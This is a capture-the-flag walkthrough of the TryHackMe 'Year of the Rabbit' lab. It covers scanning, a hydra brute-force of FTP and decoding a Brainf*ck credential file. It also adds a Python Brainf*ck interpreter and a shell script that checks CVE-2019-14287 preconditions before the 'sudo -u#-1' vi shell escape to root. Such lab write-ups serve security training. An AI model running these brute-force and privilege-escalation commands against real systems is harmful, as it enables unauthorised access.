Year of The Rabbit TryHackMe Writeup
A writeup for TryHackMe Year of the Rabbit room.
The IP address of the target is 10.10.51.145. You should change it to yours.
Nmap
sudo nmap -sS -sV -A 10.10.51.145
Gobuster
gobuster dir -u 10.10.51.145 -w gobusterDir.txt
Website Inspection
I visited the assets page and found this in style.css:
Well, I visited the link, but I got rickrolled :)
I also watched the rickroll video, and there was a voiceover saying you are looking in the wrong place.
Then I opened Burp Suite and inspected the super secret flag link again. Apparently, someone hid this in the GET request.
There is a picture of a woman. Probably something is hidden in it.
I downloaded the file and tried a few things like exiftool and steghide, but they didn't work. However, the strings command did the trick.
strings Hot_Babe.png
FTP
We got a username and a password list. I will copy and paste these into a text file and start hydra.
hydra -l ftpuser -P pass.txt ftp://10.10.51.145 -V
Now we can connect.
There is a file named Eli’s Creds. I will transfer it to our local machine.
get Eli's_Creds.txt
Well, it contains something encoded as a Brainf*ck program.
We can run it in any online Brainf*ck interpreter and get Eli's username and password.
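Rather than pasting credentials into a random website, the file can be run locally. The interpreter below is an added example and is not part of the original writeup; the "Hello World!" program is the classic public-domain one, and the sample credential string is constructed here (the real contents of Eli's_Creds.txt are not reproduced).

```python
"""Minimal Brainf*ck interpreter, so a credential file like Eli's can be
decoded offline instead of being pasted into an online decoder."""

from collections import defaultdict


def build_jump_table(code: str) -> dict:
    """Match every '[' with its ']' so loops can be skipped or repeated in O(1)."""
    jumps, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise SyntaxError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise SyntaxError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_bf(code: str, stdin: str = "", max_steps: int = 10_000_000) -> str:
    """Execute a Brainf*ck program and return everything it printed.

    Cells are 8-bit and wrap, the tape is unbounded in both directions,
    and max_steps stops a buggy or hostile program from spinning forever.
    """
    code = "".join(ch for ch in code if ch in "+-<>.,[]")  # drop comments/whitespace
    jumps = build_jump_table(code)
    tape = defaultdict(int)
    ptr = pc = steps = 0
    inp = iter(stdin.encode())
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # back to the matching '[' (re-checked on next step)
        pc += 1
    return out.decode("latin-1")


def encode_bf(text: str) -> str:
    """Naive encoder (one cell per character), used only to build sample input."""
    return "".join("+" * ord(c) + ".>" for c in text)


# Classic "Hello World!" program (public domain), exercising nested loops.
HELLO_WORLD = (
    "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++.."
    "+++.>>.<-.<.+++.------.--------.>>+.>++."
)

# Constructed stand-in for Eli's_Creds.txt; the real file is not reproduced.
SAMPLE_CREDS = encode_bf("User: eli\nPassword: not-the-real-one")

if __name__ == "__main__":
    print(run_bf(HELLO_WORLD), end="")
    print(run_bf(SAMPLE_CREDS))
```

To decode the real file, read it and pass its contents to `run_bf`; any non-Brainf*ck characters are ignored, so the file can be fed in unmodified.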
SSH
I will search for the user flag. We can go up through the directories and search.
find / -name user.txt 2>/dev/null
Okay, let's look for s3cr3t.
locate s3cr3t
We have the password for gwendoline now. We can disconnect and reconnect as gwendoline.
Let's obtain the user flag.
cat user.txt
Root Flag
We can run the vi command with sudo. I checked GTFOBins, but that did not work. Then I checked the sudo version, and apparently it is vulnerable.
I will try CVE-2019-14287 first, since it is a one-liner. It works when sudo is older than 1.8.28 and the sudoers rule allows the command as any user except root (ALL, !root): the user ID -1 is not rejected, and it resolves to uid 0.
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
This will open vi. Type :!/bin/bash and press Enter. Now we are root.
We can go to /root directory and obtain the flag.
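Before firing the exploit, it is worth confirming both preconditions of CVE-2019-14287: a sudo version older than 1.8.28, and a sudoers entry that grants a command as ALL users except root. The POSIX shell script below is an added example, not from the original writeup; the function names are mine and the `sudo -l` output it is fed in the comments is constructed.

```sh
#!/bin/sh
# Precondition check for CVE-2019-14287 (the sudo "-u#-1" bypass).
# Both must hold: sudo < 1.8.28, and a rule of the form "(ALL, !root) ... cmd".

# Returns 0 if VERSION (e.g. "1.8.27p1", the last word of `sudo -V`'s first
# line) is older than 1.8.28, the release that fixed the bug.
sudo_version_vulnerable() {
    printf '%s\n' "$1" | awk -F. '{
        major = $1 + 0; minor = $2 + 0; patch = $3 + 0   # "27p1" -> 27
        vuln = (major < 1) || (major == 1 && (minor < 8 || (minor == 8 && patch < 28)))
        exit !vuln
    }'
}

# Returns 0 if one line of `sudo -l` output grants a command as every user
# except root, e.g. "(ALL, !root) NOPASSWD: /usr/bin/vi ...".
rule_allows_all_but_root() {
    case "$1" in
        *"(ALL"*"!root)"*) return 0 ;;
        *) return 1 ;;
    esac
}

# $1 = sudo version string, $2 = full `sudo -l` output.
# Prints the exploit command for the first matching rule, or returns 1.
check_cve_2019_14287() {
    sudo_version_vulnerable "$1" || return 1
    cmd=$(printf '%s\n' "$2" | while IFS= read -r line; do
        if rule_allows_all_but_root "$line"; then
            # strip the "(runas) " prefix and an optional NOPASSWD: tag
            printf '%s\n' "$line" | sed 's/^.*) *//; s/^NOPASSWD: *//'
            break
        fi
    done)
    [ -n "$cmd" ] || return 1
    printf 'sudo -u#-1 %s\n' "$cmd"
}

# Usage on the target (not run here):
#   check_cve_2019_14287 "$(sudo -V | awk 'NR==1{print $NF}')" "$(sudo -l)"
```

If the check prints nothing, one of the two preconditions is missing and the `-u#-1` trick will be refused; a rule that reads `(ALL)` or `(root)` instead of `(ALL, !root)` is not exploitable this way regardless of the sudo version.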